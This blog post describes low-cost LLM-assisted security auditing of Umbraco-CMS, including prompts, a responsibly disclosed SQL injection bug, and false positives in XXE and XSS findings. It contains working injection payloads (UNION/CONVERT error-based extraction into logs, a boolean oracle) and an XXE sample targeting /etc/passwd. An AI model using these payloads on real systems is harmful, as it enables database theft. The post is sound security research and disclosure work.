Carlini-style software vulnerability hunting, on a budget

Finding Security Bugs in Umbraco-CMS with LLMs for 1% of the Cost

Nicholas Carlini gave a talk a few weeks ago at [un]prompted 2026. In it, he describes how Anthropic have been using their Claude 4.5 & 4.6 series models to automate searching for security issues in repositories. He’s had some success, and managed to get a few new CVEs to his name with the technique. While novel, Carlini’s approach, as described, is an expensive way to search for bugs. I think that by using a heuristics-based approach to pre-search the codebase for interesting files before hunting, we can reduce the cost of his technique by 99% or more, while retaining most of the benefits. The prompts used in this article are organised in the companion repository at https://github.com/Etive-Mor/language-model-look-kit.

Note: This article isn’t about Anthropic’s Mythos series.

In his talk, Carlini describes writing a bash script which loops through every ${file} in a repository. The script launches an instance of Claude Code, tells it that it’s playing a Capture The Flag (CTF) discovery game, and asks it to search for potential vulnerabilities in the codebase, focussing on ${file} as a starting point. For each file, he invokes the process five times. He found a few security vulnerabilities and lots of regular bugs too, including a long-standing heap buffer overflow in the Linux Kernel (a super rare find).
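Carlini hasn’t published the script itself, so the following is a minimal Python sketch of the loop as described: every file, five independent Claude Code runs, each seeded with a CTF-style prompt. The `claude -p` invocation and the prompt wording are my assumptions, not his actual code.

```python
"""Sketch of the brute-force sweep Carlini describes: for every file in
the repository, launch five independent Claude Code sessions, each told
to play a CTF-style vulnerability hunt starting from that file."""
import subprocess
from pathlib import Path

# Assumed prompt wording -- Carlini's actual prompt isn't published.
PROMPT = (
    "You are playing a capture-the-flag discovery game. Search this "
    "repository for potential security vulnerabilities, using {file} "
    "as your starting point."
)

def build_invocations(repo_root: str, runs_per_file: int = 5) -> list[list[str]]:
    """One `claude -p <prompt>` command per (file, run) pair."""
    commands = []
    for path in sorted(Path(repo_root).rglob("*")):
        if path.is_file():
            for _ in range(runs_per_file):
                commands.append(["claude", "-p", PROMPT.format(file=path)])
    return commands

def run_sweep(repo_root: str) -> None:
    for cmd in build_invocations(repo_root):
        subprocess.run(cmd)  # each run is a fresh, independent session

# run_sweep("path/to/linux")  # ~80k files x 5 runs: the expensive part
```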

That’s a lot of tokens

Carlini’s approach is fairly “brute force”, and definitely super expensive. The Linux Kernel has 80k+ files containing tens of millions of lines of code. If we set a conservative average Claude Code invocation cost of $0.10 per file, and five invocations per file, this process would cost $40k across the Linux Kernel. The Anthropic Fellows program offers 4 months of $15k/mo in compute funding, so this mid-five-figure price is within the expected range for an internal research experiment.
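The arithmetic behind that figure, using integer cents to keep it exact (the $0.10 per invocation is the conservative guess above, not a measured cost):

```python
# Back-of-envelope cost of the brute-force sweep: five Claude Code
# invocations per file at an assumed ~$0.10 (10 cents) each.
def sweep_cost_usd(file_count: int, runs_per_file: int = 5,
                   cents_per_run: int = 10) -> float:
    return file_count * runs_per_file * cents_per_run / 100

linux = sweep_cost_usd(80_000)   # rough Linux kernel file count
umbraco = sweep_cost_usd(8_500)  # Umbraco-CMS, discussed later

assert linux == 40_000   # the ~$40k estimate above
assert umbraco == 4_250  # roughly the $4k Umbraco estimate
```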

Carlini is embedded in Anthropic, so had access to basically unlimited compute for the project. For him, looping through every file in Linux and spawning a Claude Code instance per file was a viable plan of action. However, even for very well funded open source projects, this would be financially ruinous. I wanted to see how much of the capability I could reproduce in a smaller open source repository, on a lower budget.

Heuristics-based vulnerability discovery

I think having a language model generate a heuristics-based list of interesting components first, and then scanning through those is a low-cost way to get a lot of the same benefits as Carlini’s technique. Maybe you don’t get 100% coverage, but hitting the most interesting 80% of files (especially those on the code hot-path) should reveal any critical bugs for less than $100.

I’ve worked with Umbraco CMS and .NET for more than a decade now, and I sit on the project’s Community Security & Privacy Team, so I thought that the best place to test out a cheaper variant of this approach was in that project’s main repository at Umbraco/Umbraco-CMS. The project has 450k lines of code across 8,500 files, so while it’s smaller than Linux, it’s still large enough to demonstrate the concept. Using the estimates above, this project would cost around $4k to run through Carlini’s technique.

With my approach, I was able to spend less than $20 in GitHub Copilot tokens, while discovering 20 potential vulnerabilities. After some human review, I whittled these down to four which were interesting enough to address. The process found no severe vulnerabilities worthy of a CVE, but did reveal a handful of (now patched) issues & bugs which required a change in the repository. This somewhat mirrors Carlini’s experience, in that he found lots of issues, and then spent a lot of time doing manual review to demonstrate them before disclosing. The process, and a deep-dive on one of the bugs, is outlined below.

Everything described in this article has been responsibly disclosed, patched, or mitigated appropriately. If you recreate any of the work below in any repository, make sure you stick to the principles of responsible disclosure. If you find any issues in any Umbraco application, please follow the “How to report a vulnerability in Umbraco” process, and report by emailing security@umbraco.com.

Building the tool

When selecting models, I wanted to take a pluralist approach, rather than limiting or coupling myself to Anthropic’s models. To achieve this, I decided to work with GitHub Copilot via VSCode’s chat features. Umbraco-CMS uses a lot of Claude Code tooling, which means the repository has lots of CLAUDE.md files. While that documentation is useful if you’re running Claude Code, it’s distributed sporadically throughout the app. Models like Codex and Mistral only access those files intermittently, if at all. I wanted to consolidate this info into a single directory, and decouple it from Claude.

Model onboarding prompt

I’ve got a template prompt which will help a language model generate a set of onboarding documents for itself for a given repository. This prompt is generically useful, not just good for security searches (I’m a contracting software engineer, and it’s the first thing I run when starting work on a new project these days). The outcome of the prompt is a clean introduction-to-{repository} directory describing everything the language models need to know about, in markdown. Since all subsequent tasks are reliant on this documentation being detailed & comprehensive, I tend to run this with the biggest model available, on its highest reasoning setting (in this case, it was Opus 4.6). The origination prompt can be found in the companion repo here.

The closing text of the origination prompt is “Start by analysing the codebase and generating the _start.md and agent-task-list.md files. Then return control to the developer.”. So, although the prompt is long, we get an opportunity to review its output early, before dispatching a dozen sub-agents reliant on its output.

When control is returned by Copilot, a couple of files have been generated. _start.md describes how to run the application, including troubleshooting and system specific stuff. Ideally, the _start.md document should describe to any arbitrary agent how it could run the app with no human intervention. Sample output can be found at language-model-look-kit/_samples/_onboarding/_start.md

Meanwhile, _agent-task-list.md contains a series of tasks to be completed by subsequent agents. The aim of the _agent-task-list.md is to describe to a subsequent agent where an interesting component of the application lives, and how that component should be documented. Sample output can be found at language-model-look-kit/_samples/_onboarding/agent-task-list.md

After reviewing the files generated by the origination prompt, I dispatch sub-agents to build the comprehensive docs: “For each task in agent-task-list, dispatch a sub-agent to write the appropriate markdown files.”. This spawns a series of sub-agents per task in _agent-task-list.md.

When the parent-agent dispatches the tasks to the sub-agents, each sub-agent is provided only its task from _agent-task-list.md and doesn’t share the context window of the parent-agent. This is useful for a few reasons: 1) it prevents the parent-agent’s context window from becoming exhausted when working on very large projects. 2) it allows the sub-agent to focus, so for example, the sub-agent documenting security considerations in the caching layer is working exclusively on that concept (there are some downsides to this approach which will become obvious later). 3) it’s parallelisable, meaning the large documentation assets are written in 10 minutes instead of a few hours, and 4) it means I can run the “dispatch sub-agent” approach on smaller cheaper models, while still getting decent results.
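The fan-out pattern above can be sketched in a few lines of Python: each worker receives only its own task text, never the parent’s context. `run_agent` is a placeholder for whatever actually launches a Copilot/Claude sub-agent, and the `##`-heading task format is an assumption about _agent-task-list.md, not its real structure.

```python
"""Sketch of the parent-agent fan-out: parse the task list, then hand
each task to an isolated worker in parallel. run_agent is a stand-in
for a real sub-agent dispatch call."""
from concurrent.futures import ThreadPoolExecutor

def parse_tasks(task_list_md: str) -> list[str]:
    """One task per '## ' heading (assumed format of _agent-task-list.md)."""
    return ["##" + chunk for chunk in task_list_md.split("##")[1:]]

def run_agent(task: str) -> str:
    # Placeholder: in practice this launches a sub-agent whose entire
    # context is this single task description, nothing from the parent.
    return f"wrote docs for: {task.splitlines()[0]}"

def dispatch(task_list_md: str) -> list[str]:
    tasks = parse_tasks(task_list_md)
    with ThreadPoolExecutor() as pool:  # parallel, independent contexts
        return list(pool.map(run_agent, tasks))
```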

That first prompt generated everything for the backend/C# code, but Umbraco-CMS’s backend has a Typescript client app (the frontend for the backend). I dispatch more subagents to run through that process focussing on the JS/TS client app: “We want to dispatch a new subagent set to create these .md files for the _notes/_onboarding/backoffice-client/ directory, focusing on the backoffice-client library - as that component is distinct enough from the rest of the application to require its own section.”. The sub-agents for the client app go through roughly the same steps as they did for the back-end code.

Once the sub-agent tasks are completed, I’ve got a directory with a few dozen files describing the Umbraco-CMS repository in reasonable detail. I review the generated documentation files manually, and they’re mostly good - some are a bit high-level for my liking, but they should be good enough for the tasks ahead. Importantly, most of them contain a section titled Security Considerations. Examples can be found in the companion repository’s _samples/_onboarding/_security/tasks/ directory.

Heuristics-based file pruning

The aim of my approach is to reduce the cost of discovery via agents. But so far, we’ve had the language models produce a bunch of tokens that Carlini didn’t, so at this point I’m actually incurring a higher token cost than he did. However, part of the documentation process included generating a “security considerations” section in each document. These sections were super high-level bullet-point lists, but they guide the next phase.

I dispatch a sub-agent, asking it to hunt for potential security issues highlighted in the new docs files. Instead of reading through every code file in the app as in Carlini’s example, we now read through every .md file in the onboarding directory. This reduces the search space for Umbraco from 8,500 files to ~40.

This sub-agent isn’t asked to go into massive detail on the potential issue, it’s just asked to find the interesting stuff in the app that’s worth looking further into. It’s not asked to validate the existence of any specific issue, just to seek out the chance of an issue, and rank how interesting/critical that vulnerability might be.

This is a security research project, so we're hunting for potential security issues in the app.

Dispatch one sub-agent to read through all of the generated files (including the files in the new `_onboarding/backoffice-client` directory). Into `_notes/_onboarding/_security/_ranking.md` write a ranking table of the most interesting sections of the application from a security research point of view. Include explanations of why specific parts are of interest.

Have the agent also produce a list of specific files which should be inspected more closely at `_notes/_onboarding/_security/_ranking-files.md`

The output shouldn't be generic like "this is the login controller, check here" it should look at code-smells which typically result in security vulnerabilities.

Ranked vulnerability opportunities

The outputs from the models up until this point have been OK, but at this point they start to get a bit weaker. The prompt generated a pair of ranking files. _ranking.md describes some potential bugs, and _ranking-files.md associates those bugs with specific lines. That part was correct according to the request; however, the model (Claude Opus) was incredibly eager about its vulnerability rankings. It found 20 components of interest, and described the severity of almost all of them as “critical” or “high”.

A few of the results included the phrase “critical / confirmed vulnerabilities”, even though no detailed investigation had been carried out. If I were to re-do this research, I’d definitely focus on this step a bit more, and make sure the prompt above constrained the output a bit. I was really hoping for dry-and-technical, but what I got was excited-fluff from the model.

Nonetheless, I continued with the effort, since Language Models are relatively good at dealing with ambiguity. Next, I wanted to break each potential vulnerability down into a task for another sub-agent to work on. The following prompt groups the items in the ranking*.md files, and generates tasks to investigate & prove-out the vulnerability.

into `_notes/_onboarding/_security/tasks/task-n.md`, where `n` is the task number, create tasks files detailing:

- what the vulnerability is
- what its suggested "blast radius" is. Don't oversell this entry, it needs to be realistic
- call chain which invokes the code or scenario
- a strategy to validate the vulnerability (a program, feature implementation, package, etc)
- an outcome which would prove that the vulnerability does/doesn't exist
- a minimal proposed fix (either implementation or guidance)

For the strategy, we want a methodology which would expose the vulnerability. The conditions are that you cannot modify the code in this repository, however you can:

- Create a small Umbraco package which exploits the vulnerability
- Implement a feature in a demo Umbraco site which exploits the vulnerability

---

Tasks to demonstrate vulnerability opportunities

I have the sub-agents produce tasks in order of their ranking, so that the most interesting stuff is demonstrated first. Each task has:

  1. High-level description of the vulnerability
  2. Description of the call chain, to make sure that the code can be executed in a production Umbraco environment
  3. Explanation of the blast radius, so that the scope can be understood
  4. Strategy to validate the vulnerability, for example a .cs file which would execute the appropriate call chain
  5. Preregistration of validation outcome expectations, so that we can later test if the language model was correct in its expectations
  6. Most importantly, a minimal proposed fix which can be submitted alongside the responsible disclosure of any bugs found.

The request generated twenty task files describing potential security vulnerabilities in Umbraco/Umbraco-CMS. They’re all fairly detailed, and a couple looked (on first glance) as if they were very high-risk to leave in the Umbraco/Umbraco-CMS repository.

SQL Injection Opportunity (now patched)

The top-ranked vulnerability was a SQL injection opportunity in the Umbraco SQL Server Syntax Provider. A lower-ranked vulnerability was an essentially identical bug in the SQLite Syntax Provider. Copilot (GPT 5.x) described this as a “critical and confirmed” issue, so this looked like a pair of severe issues found inside Umbraco! As I’ll describe in the following section, it ultimately isn’t a very critical issue, and it also hadn’t been confirmed when GPT asserted that it had (a lesson in the foibles of trusting LLM output without human verification).

The generated task file was created by Claude Sonnet 4.6, and can be found in full at the companion repository _samples/_umbraco-cms-samples/csharp-sample-sql-task.md

Diagnosing the SQL Injection opportunity

Umbraco uses SqlServerSyntaxProviders for common SQL functions so that developers don’t need to write a bunch of raw SQL statements all over their app. One of the pre-programmed queries checks whether a table already has a primary key: if it does, it returns true, otherwise false. That’s useful if you’re a package developer during an upgrade, as re-applying an existing primary key causes exceptions. This specific implementation contains an unambiguous SQL injection opportunity:

public override bool DoesPrimaryKeyExist(IDatabase db, string tableName, string primaryKeyName)
{
   IEnumerable<SqlPrimaryKey>? keys = db.Fetch<SqlPrimaryKey>(
       $"select * from sysobjects where xtype='pk' and  parent_obj in (select id from sysobjects where name='{tableName}')")
       .Where(x => x.Name == primaryKeyName);
   return keys.FirstOrDefault() is not null;
}

tableName is passed directly into the SQL statement, rather than parameterised. This means anything that’s passed into the DoesPrimaryKeyExist function’s tableName parameter will be executed by the SQL instance. That’s interesting, but the function returns a bool, which adds a level of complexity to exploiting this vulnerability. Even if I can have the SQL server execute code, it’s only going to return a 1 or 0.
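A true/false result is still enough for blind extraction, though: each call answers one yes/no question about the data. Here’s a minimal sqlite3 simulation of the same interpolation bug being used as a boolean oracle; the schema and queries are illustrative, not Umbraco’s actual code.

```python
"""Blind boolean-oracle injection: even a bool-returning function leaks
data, one yes/no question at a time. Simulated with sqlite3."""
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE umbracoUser (userName TEXT)")
db.execute("INSERT INTO umbracoUser VALUES ('admin')")

def does_table_exist(table_name: str) -> bool:
    # Vulnerable: table_name is interpolated, mirroring DoesPrimaryKeyExist.
    rows = db.execute(
        f"SELECT 1 FROM sqlite_master WHERE name='{table_name}'"
    ).fetchall()
    return len(rows) > 0

# Oracle question: "does the first username start with 'a'?"
payload = "x' UNION SELECT 1 FROM umbracoUser WHERE userName LIKE 'a%"
assert does_table_exist(payload) is True
payload = "x' UNION SELECT 1 FROM umbracoUser WHERE userName LIKE 'z%"
assert does_table_exist(payload) is False
```

Repeating the question per character (LIKE 'a%', LIKE 'ad%', …) recovers the whole value; this is exactly the pattern tools like sqlmap automate.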

Demonstrating the SQL Injection opportunity

The generated task file included a technique to validate the vulnerability. Though the core concept was sound, it was a very roundabout way of executing the call chain to reach the vulnerable code. It included building out a .NET package, installing a custom SQL profiler, and a bunch of other steps which seemed needless. Importantly, the reproduction steps only checked that the raw SQL arrived at the server, and didn’t check whether the attacker could read the results. That’s not a useless exploit, but the impact is reduced significantly if an attacker can create/update/delete but cannot read data.

For starters, for a proof of concept useful for responsible disclosure, we don’t need to build out the package, attach the SQL profiler, etc. We just need to launch an Umbraco site locally, and add in a new .cs file which registers a migration with Umbraco via an IComposer. Secondly, we can expand the exploit’s scope to include read. As a C#/.NET developer, I know that when SQL Server & SQLite throw an Exception on a value conversion operation, the value being converted is included inside the Exception. As an Umbraco developer, I know that exceptions are logged by default. So, even though I only have a true/false result available from DoesPrimaryKeyExist, I can force an exception to redirect schema and content into the Umbraco logfile, and exfiltrate it by reading the log back.
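The mechanism can be simulated in a few lines of Python, with int() standing in for SQL Server’s CONVERT: the conversion failure quotes the value it choked on, and a list stands in for the Umbraco log. This is an illustration of the trick, not the live PoC.

```python
"""Log-exfiltration via type-conversion errors: the caller only sees a
bool, but the error message (which Umbraco logs) embeds the data."""
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE umbracoUser (userEmail TEXT)")
db.execute("INSERT INTO umbracoUser VALUES ('admin@example.com')")

log = []  # stands in for the Umbraco log file

def probe(table_name: str) -> bool:
    try:
        rows = db.execute(
            f"SELECT 1 FROM sqlite_master WHERE name='{table_name}'"
        ).fetchall()
        # int() stands in for SQL Server's CONVERT(INT, ...): a failed
        # conversion raises an error that quotes the offending value.
        return any(int(value) for (value,) in rows)
    except ValueError as exc:
        log.append(str(exc))  # exceptions are logged by default
        return False

payload = "x' UNION SELECT userEmail FROM umbracoUser WHERE '1'='1"
assert probe(payload) is False        # the caller only ever sees a bool...
assert "admin@example.com" in log[0]  # ...but the log now holds the data
```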

The PoC code includes two AsyncMigrationBase-extending classes. The first is omitted for brevity, but it just registers migrations in the Umbraco app. The second is a set of payloads to pass into the DoesPrimaryKeyExist function’s tableName parameter.

public class SqlInjectionProbe_Migration : AsyncMigrationBase
{
   // ...
   protected override Task MigrateAsync()
   {
       string payloadD = "x' UNION SELECT id FROM sysobjects WHERE name='umbracoUser";
       string payloadE = "x' UNION SELECT TOP 1 CONVERT(INT, userName) FROM dbo.umbracoUser WHERE '1'='1";
       string payloadG = "x' UNION SELECT TOP 1 CONVERT(INT, userEmail) FROM dbo.umbracoUser WHERE '1'='1";

       RunProbe("PayloadD_SchemaDiscovery",   payloadD, "PK_umbracoNode");
       RunProbe("PayloadE_UserExfiltration",  payloadE, "PK_umbracoNode");
       RunProbe("PayloadG_EmailExfiltration", payloadG, "PK_umbracoNode");

       return Task.CompletedTask;
   }
   // ...
}

So, what’s happening in these payloads?

  1. PayloadD demonstrates schema discovery capabilities, by showing that the umbracoUser table exists in the application. An attacker could iterate through common Umbraco or C# table names to expose the structure of the database.
  2. PayloadE performs username exfiltration by causing a type conversion error. As Umbraco developers, we know that umbracoUser contains a text column userName. Asking SQL Server to CONVERT that text to an INT fails, and the conversion error message quotes the offending value, passing the userName into the logfile. A restructured version of this query would reveal values in other columns with the same technique
  3. PayloadG applies the same exfiltration technique to reveal the user email addresses

The migrations are put into an Umbraco IComposer, meaning they’re automatically applied to the database on the next site startup. IComposers in Umbraco can be registered by first party, second party, or third party code (which is why Claude described this as a high-impact vulnerability). When the site next starts up, the log file includes both schema and data from the database.

With a bit of effort, these three commands can be piped into a tool like sqlmap, allowing an attacker to enumerate the database schema, and subsequently all table data too (this includes well-known Umbraco tables like umbracoUser, and also arbitrarily named tables, e.g. customMemberPaymentDetail). Fortunately, because the bug is in a SELECT statement, there’s no good way to run an INSERT/UPDATE/DELETE command, so the damage is limited to reading the database. Still not ideal. Almost any process which has access to run the DoesPrimaryKeyExist function also has the ability to read from the logfile, so the process of exfiltrating this data is straightforward, and omitted from the PoC for brevity.

So why isn’t this SQL Injection opportunity as big a deal as Claude thinks?

Claude reported the blast radius on this as very wide. It described that the exploit could be triggered by “Any party that can register an Umbraco migration — including third-party packages installed by a site administrator. The attack does NOT require direct database access or admin-level HTTP requests”. Nothing written there is incorrect, but the language model has missed the fact that any code which can execute DoesPrimaryKeyExist can also execute the Database.Fetch function, which already executes arbitrary SQL. So, although DoesPrimaryKeyExist definitely has a SQL Injection bug, that bug is only ever exploitable by code which already has a more convenient route to execute SQL commands.

SQL Injection disclosure

Even though the bug didn’t seem to be exploitable in any meaningful way, I still followed Umbraco’s responsible disclosure process. I didn’t want to leave the opportunity in the repository, but also didn’t want to open a public issue only to find that there was a side-channel I’d not considered. The support engineer dealing with the report at Umbraco dutifully & quickly reproduced my results. They responded that, although this was an interesting find and required a PR to fix, it wasn’t a CVE-worthy exploit because of the existence of the legitimate Fetch method. I agreed with the engineer, and opened a PR to parameterise the SQL statement.
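Conceptually the fix is the same in any driver: bind tableName as a query parameter so it can never terminate the string literal. A sqlite3 sketch of the parameterised behaviour (illustrative schema, not the actual Umbraco patch):

```python
"""Parameterised version of the earlier check: the driver binds the
value, so an injection payload is compared as a plain string."""
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE umbracoUser (userName TEXT)")
db.execute("INSERT INTO umbracoUser VALUES ('admin')")

def does_table_exist(table_name: str) -> bool:
    # Parameterised: table_name can never close the string literal
    # and smuggle in a UNION clause.
    rows = db.execute(
        "SELECT 1 FROM sqlite_master WHERE name=?", (table_name,)
    ).fetchall()
    return len(rows) > 0

assert does_table_exist("umbracoUser") is True
payload = "x' UNION SELECT 1 FROM umbracoUser WHERE userName LIKE 'a%"
assert does_table_exist(payload) is False  # just an oddly named table now
```

This works here because, as in the Umbraco query, the name is used as a string literal in a WHERE clause rather than as a SQL identifier, so ordinary parameter binding applies.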

The initial result from the language models was promising, and the way that Claude & GPT both described this injection opportunity as a “significant & confirmed” issue made it look even more promising. In the end, it took a huge amount of human effort & expertise to find that this was a false positive. The bug fix PR is merged into Umbraco/Umbraco-CMS, and is due to be released in the next Umbraco release, version 17.4.

Results

So the high-severity SQL Injection issue turned out to be a false positive. But there are still 18 other issues to be considered. Some quick QA shows that the models consistently over-hyped the bugs, and sometimes misunderstood the implementation.

XSS via unsafe HTML Injection

Three issues were caused by sanitizeHTML not being called on untrusted HTML sources; this opens that code up to Cross Site Scripting (XSS) exploits. GPT and Claude both described these as “high-severity” and “critical” issues.

Looking at the files in question, the “untrusted sources” are UmbracoHQ, who publish news stories into the Umbraco dashboard. So the attack vector here involves sitting between Umbraco’s well-known domain and the target Umbraco instance. While there’s some risk here, it’s inaccurate to describe Umbraco.com as an untrusted source in this context. Developers can choose to remove the dashboard section which renders this code if they wish, as Aaron Sadler describes.

For the underlying sanitizeHTML issues, I opened a PR which was superseded by a more comprehensive UmbracoHQ patch a couple of weeks later. During my QA on those issues, I found that some of the documentation around sanitizeHTML was incorrect, so I opened a separate PR to deal with that too.

XXE via misconfigured XmlProcessing

Five of the issues raised were related to XXE attacks in Umbraco’s OEmbed code. Similar to the SQL Injection opportunity, this looked promising, but required a lot of human effort to conclude it was a false positive. When XML data is loaded from a remote endpoint in Umbraco, it’s parsed using .NET’s built-in XmlDocument parsing. If misconfigured, this can allow denial-of-service attacks, or could allow an attacker to read files on the host machine.

The attack vector for this vulnerability included a site like Flickr being compromised, at the same time as a content editor clicked a rarely used “download content” feature in the Umbraco backoffice. This is an unlikely pair of circumstances, but could be achieved in conjunction with some kind of man-in-the-middle attack imitating Flickr, so it was still worth testing.

I wrote a small program which would serve an XXE payload through a python http server which would inject a “hello XXE” text into the Umbraco app’s console log. I pointed Flickr.com XML requests towards the attack server. For some reason it didn’t cause the expected outcome…

Looking closer at the code in question, I realised Claude, GPT, and Mistral were all misreferencing .NET’s documentation. Since .NET 5 (the 2020 release), the framework has defaulted to prohibiting DTD processing when parsing untrusted XML.
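The same default-deny behaviour is easy to observe in Python’s stdlib parser, which refuses external entities out of the box. This isn’t the .NET code path, just an illustration of why the probe fizzled against a modern parser:

```python
"""Modern XML parsers reject external entities by default. Python's
xml.etree raises ParseError rather than fetching file:///etc/passwd,
analogous to the prohibit-DTD default the .NET parser showed."""
import xml.etree.ElementTree as ET

XXE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<r>&xxe;</r>'
)

try:
    ET.fromstring(XXE)
    leaked = True
except ET.ParseError:
    leaked = False  # the entity reference is rejected, nothing is read

assert leaked is False
```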

GPT, Claude, and Mistral all described this as a critical vulnerability due to their misunderstanding of the downstream framework code. I spent a few hours demonstrating that this was a false positive. Still, as part of a defense-in-depth approach, I opened a PR in the repository to explicitly set DtdProcessing to Prohibit. As a nice bonus, this cleared up code analysis warning CA3075 in the project.

Bypassing TLS Certificate Validation

Umbraco allows developers to register named HttpClients, and those clients can enable a property DangerousAcceptAnyServerCertificateValidator. That disables TLS certificate validation for requests made with that HttpClient. This is more of a feature than a bug: lots of engineers run services with untrusted local certificates during development (until recently, it was a massive pain to do otherwise on Windows). Umbraco handles this in the industry-standard way, by making the engineer type out “Dangerous Accept” when invoking this behaviour.

This is described as “severe” by the agents. Certainly, a downstream site enabling this feature in production would be severe, but Umbraco-CMS offering this functionality is expected of any .NET application. The language models appear to have misunderstood their assignment: they’re testing the security of Umbraco-CMS’s code, not the implementation of a hypothetical worst-case downstream implementer.

Unauthenticated controller endpoints

Several other issues were raised where C# controllers included an [AllowAnonymous] decoration. This allows any unauthenticated caller to execute the controller’s method and receive data from it. That’s a legitimate concern if the controller reveals sensitive information, for example a Members controller which allowed anonymous access to arbitrary members in the database.

Sometimes though, you need to send variable server-side data to users who aren’t logged in. For example, the ServerStatusController describes if the server requires an upgrade. Unauthenticated users need to know this so that they’re presented with the appropriate upgrade UI.

This class of issues was fairly disappointing to see from the language models. The endpoints which are [AllowAnonymous] in the repository are all marked up with surrounding comments explaining why the method has that decoration. The language models had the freedom to roam around the codebase and confirm that the data being accessed was non-sensitive in nature. One of the reports returned the statement “The research question is: exactly what data is returned to unauthenticated callers, and does any of that data meaningfully assist an attacker in mounting a targeted attack?”. The models had the capacity to declare these as false positives in their reports, but didn’t. This creates a time-consuming problem for my technique.

Other issues

The remaining issues were either duplicates of the above, or a misunderstanding of a core .NET concept.

Process Cost

I ran this inside GitHub Copilot using a mixture of Claude Opus 4.5/4.6, Claude Sonnet 4.5/4.6, and various GPT 5.x versions. I also ran Mistral Large via an API in Cline for a few requests. The total non-subsidised gross cost for Copilot across the three days was below $18. Mistral’s API consumption for the day I used it was just under $2.

Conclusion

So, no CVEs found, but a few PRs merged, and Umbraco’s documentation is a little clearer than when I started. Overall, I found this to be a useful process, and I certainly learned more about software security, especially for Umbraco-CMS.

Near the end of his talk, Carlini describes some of the challenges of applying his technique in the real world, and they’re all things that I also encountered. He had a bit of a needle-in-a-stack-of-needles problem, in that Claude found loads of potential vulnerabilities, and Carlini is one engineer. Neither Carlini nor I wanted to commence the responsible disclosure process for the bugs until we’d demonstrated whether they were exploitable in practice. Each of those potential exploits requires expertise to diagnose, reproduce, and repair.

I think what I have managed to do is roughly replicate Carlini’s process on a budget, bringing this type of scanning within the token budget of most large open source projects. Earlier I guesstimated that running Carlini’s process across the Umbraco/Umbraco-CMS repository might cost $4k. The cost to run my process was lower than $20 in GitHub Copilot tokens. The cost to review and diagnose the issues was:

  • 3 days of my time
  • 1 day of my very patient software security colleague’s time
  • 1-2 days of UmbracoHQ’s time investigating the issues

I think it’s a reasonable assumption that Carlini’s reports would incur roughly the same manual engineering labour.

Feel free to try the prompts out on your own repositories. They’re published at https://github.com/Etive-Mor/language-model-look-kit. Your mileage may vary, as some vendors are introducing rules & guardrails which block 2nd and 3rd party security auditing prompts from working.